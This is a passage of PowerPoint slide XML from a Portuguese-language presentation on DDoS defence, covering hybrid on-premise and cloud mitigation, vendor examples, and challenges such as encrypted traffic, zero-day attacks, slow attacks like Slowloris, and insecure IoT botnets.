        <p:nvSpPr>
          <p:cNvPr id="105" name="Shape 101"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6998838" y="4736306"/>
            <a:ext cx="801132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06" name="Text 102"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6998838" y="4736306"/>
            <a:ext cx="872570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Stateless Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Shape 103"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7828545" y="4736306"/>
            <a:ext cx="745489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08" name="Text 104"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7828545" y="4736306"/>
            <a:ext cx="816927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Threat Intelligence</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Shape 105"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6210291" y="4900613"/>
            <a:ext cx="657978" cy="135731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10" name="Text 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6210291" y="4900613"/>
            <a:ext cx="729416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 Signaling</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Text 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6210291" y="5130998"/>
            <a:ext cx="58118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675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="Text 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6720036" y="5130998"/>
            <a:ext cx="110563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Até 40 Gbps por appliance</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="Text 109"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6210291" y="5245298"/>
            <a:ext cx="53352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Integração:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Text 110"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6672374" y="5245298"/>
            <a:ext cx="138669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Arbor Cloud para proteção híbrida</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="Shape 111"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="5607844"/>
            <a:ext cx="8572472" cy="23860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16" name="Shape 112"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8426388" y="5679281"/>
            <a:ext cx="360397" cy="135731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117" name="Text 113"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8426388" y="5679281"/>
            <a:ext cx="431834" cy="13573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56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Híbrida</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="563" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1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5736431"/>
            <a:ext cx="214313" cy="171450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="Text 114"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700088" y="5722144"/>
            <a:ext cx="37552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Soluções Híbridas: Combinando On-Premise e Nuvem</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Text 115"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="6007894"/>
            <a:ext cx="81295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 soluções híbridas combinam a proteção on-premise (com appliances) para ataques menores ou na camada de aplicação, com a capacidade de redirecionar o tráfego para um serviço de mitigação na nuvem quando ataques volumétricos maiores são detectados.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="Shape 116"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="6436519"/>
            <a:ext cx="2609841" cy="13430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22" name="Text 117"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="6522244"/>
            <a:ext cx="25098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Vantagens</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1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6740128"/>
            <a:ext cx="100013" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="Text 118"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="900113" y="6736556"/>
            <a:ext cx="173375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Proteção local para ataques menores</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1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6911578"/>
            <a:ext cx="100013" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126" name="Text 119"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="900113" y="6908006"/>
            <a:ext cx="177262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Escalabilidade para ataques massivos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1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7083028"/>
            <a:ext cx="100013" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="Text 120"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="900113" y="7079456"/>
            <a:ext cx="167247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Menor latência em operação normal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1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7254478"/>
            <a:ext cx="100013" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="Text 121"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="900113" y="7250906"/>
            <a:ext cx="172806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Maior controle sobre dados sensíveis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131" name="Shape 122"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3409941" y="6436519"/>
            <a:ext cx="2609841" cy="13430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32" name="Text 123"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3495666" y="6522244"/>
            <a:ext cx="25098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Funcionamento</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="Text 124"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3609966" y="6722269"/>
            <a:ext cx="23955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local de ataque via appliance</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="Text 125"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3609966" y="6893719"/>
            <a:ext cx="23955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Avaliação da magnitude do ataque</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="Text 126"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3609966" y="7065169"/>
            <a:ext cx="23955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 exceder capacidade local, sinalização para nuvem</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="Text 127"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3609966" y="7379494"/>
            <a:ext cx="23955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Redirecionamento do tráfego via BGP/DNS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Text 128"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3609966" y="7550944"/>
            <a:ext cx="23955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Retorno ao normal após mitigação</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="Shape 129"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6134081" y="6436519"/>
            <a:ext cx="2609841" cy="13430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39" name="Text 130"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6219806" y="6522244"/>
            <a:ext cx="25098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Exemplos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1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06" y="6740128"/>
            <a:ext cx="50006" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="Text 131"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6298388" y="6736556"/>
            <a:ext cx="160299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Netscout Arbor AED + Arbor Cloud</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1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9806" y="6911578"/>
            <a:ext cx="50006" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="Text 132"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6298388" y="6908006"/>
            <a:ext cx="169747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Radware DefensePro + Cloud DDoS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14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806" y="7083028"/>
            <a:ext cx="50006" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="Text 133"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6298388" y="7079456"/>
            <a:ext cx="171232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A10 TPS + Verisign DDoS Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14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9806" y="7254478"/>
            <a:ext cx="50006" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147" name="Text 134"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6298388" y="7250906"/>
            <a:ext cx="108406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F5 BIG-IP + Cloudflare</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="Shape 135"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="8093869"/>
            <a:ext cx="8572500" cy="4572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49" name="Shape 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="8093869"/>
            <a:ext cx="28575" cy="4572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50" name="Text 137"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="371475" y="8193881"/>
            <a:ext cx="104960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Escolha da Solução:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="Text 138"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="371475" y="8193881"/>
            <a:ext cx="7955012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seleção da solução ou combinação de soluções depende do perfil de risco da organização, do orçamento, da capacidade técnica interna e dos requisitos específicos de desempenho e disponibilidade.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="Shape 139"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="8836819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53" name="Text 140"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="8922544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54" name="Text 141"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8357797" y="8922544"/>
            <a:ext cx="5718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12/14</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="78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1298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Desafios Atuais e o Futuro do DDoS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evolução contínua da ameaça e das defesas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71625"/>
            <a:ext cx="8158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cenário de ataques DDoS continua a evoluir, apresentando desafios constantes para as equipes de segurança e os provedores de mitigação. A corrida armamentista entre atacantes e defensores está longe de terminar.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285750" y="2200275"/>
            <a:ext cx="4200525" cy="217170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28625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9" y="2436019"/>
            <a:ext cx="150019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2969" y="2343150"/>
            <a:ext cx="260384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sobre Tráfego Criptografado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892969" y="2543175"/>
            <a:ext cx="26038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desafio da inspeção de HTTPS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885825" y="2786063"/>
            <a:ext cx="35290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 a maior parte do tráfego web hoje criptografado, as soluções de mitigação enfrentam desafios para inspecionar o tráfego e detectar ataques na camada de aplicação (L7).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Shape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825" y="3300413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971550" y="3386138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Implicações</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="9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3595092"/>
            <a:ext cx="42863" cy="8572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42988" y="3595092"/>
            <a:ext cx="225868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Necessidade de descriptografia e re-criptografia na borda</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675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3737967"/>
            <a:ext cx="42863" cy="8572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42988" y="3737967"/>
            <a:ext cx="1548743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Equilíbrio entre inspeção e privacidade</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675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" y="3880842"/>
            <a:ext cx="42863" cy="8572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042988" y="3880842"/>
            <a:ext cx="180600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Sobrecarga de processamento para SSL/TLS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675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4023717"/>
            <a:ext cx="42863" cy="8572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042988" y="4023717"/>
            <a:ext cx="2353866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volumétricos ainda detectáveis sem descriptografia</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Shape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657725" y="2200275"/>
            <a:ext cx="4200525" cy="21574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0" name="Shape 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4800600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9" y="2436019"/>
            <a:ext cx="171450" cy="17145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5264944" y="2343150"/>
            <a:ext cx="202302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Zero-Day</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5264944" y="2543175"/>
            <a:ext cx="20230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Explorando vulnerabilidades desconhecidas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="2786063"/>
            <a:ext cx="35290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que exploram vulnerabilidades recém-descobertas e ainda não corrigidas em softwares ou protocolos representam um desafio significativo.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Shape 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="3157538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6" name="Text 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5343525" y="3243263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Estratégias de Defesa</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody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525" y="3452217"/>
            <a:ext cx="42863" cy="85725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414963" y="3452217"/>
            <a:ext cx="2034713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baseada em anomalias e comportamento</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3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25" y="3595092"/>
            <a:ext cx="42863" cy="85725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5414963" y="3595092"/>
            <a:ext cx="1653164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Virtual patching em WAFs e sistemas IPS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody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3525" y="3737967"/>
            <a:ext cx="42863" cy="85725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5414963" y="3737967"/>
            <a:ext cx="1834576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Compartilhamento de inteligência de ameaças</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4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3525" y="3880842"/>
            <a:ext cx="42863" cy="85725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5414963" y="3880842"/>
            <a:ext cx="201102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Monitoramento contínuo de novas vulnerabilidades</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Shape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="4529138"/>
            <a:ext cx="4200525" cy="217170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6" name="Shape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428625" y="4672013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4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" y="4764881"/>
            <a:ext cx="128588" cy="171450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Text 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="892969" y="4672013"/>
            <a:ext cx="244263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de Baixo Volume e Lentos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Text 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="892969" y="4872038"/>
            <a:ext cx="24426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Evasão de detecção por limiares</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Text 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825" y="5114925"/>
            <a:ext cx="35290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como Slowloris ou Slow Read são projetados especificamente para evitar a detecção por limiares de volume, parecendo tráfego legítimo enquanto consomem recursos.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Shape 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825" y="5629275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52" name="Text 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="57150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Desafios de Mitigação</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5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550" y="5923955"/>
            <a:ext cx="42863" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Text 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1042988" y="5923955"/>
            <a:ext cx="164881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Monitoramento da duração das conexões</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5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" y="6066830"/>
            <a:ext cx="42863" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Text 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1042988" y="6066830"/>
            <a:ext cx="203934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Estabelecimento de taxas de transferência mínimas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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550" y="6209705"/>
            <a:ext cx="42863" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Text 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1042988" y="6209705"/>
            <a:ext cx="2253658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de comportamento anômalo em sessões HTTP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5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550" y="6352580"/>
            <a:ext cx="42863" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Text 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1042988" y="6352580"/>
            <a:ext cx="2040992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Timeouts adaptativos baseados em comportamento</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Shape 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657725" y="4529138"/>
            <a:ext cx="4200525" cy="217170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62" name="Shape 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4800600" y="4672013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6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4900" y="4764881"/>
            <a:ext cx="128588" cy="171450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Text 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5264944" y="4672013"/>
            <a:ext cx="20006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Proliferação de IoT Inseguro</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Text 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5264944" y="4872038"/>
            <a:ext cx="20006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Combustível para botnets massivas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Text 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="5114925"/>
            <a:ext cx="35290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falta de padrões de segurança consistentes, a dificuldade de atualizar firmwares e a negligência dos usuários criam um reservatório quase inesgotável de potenciais bots.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Shape 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
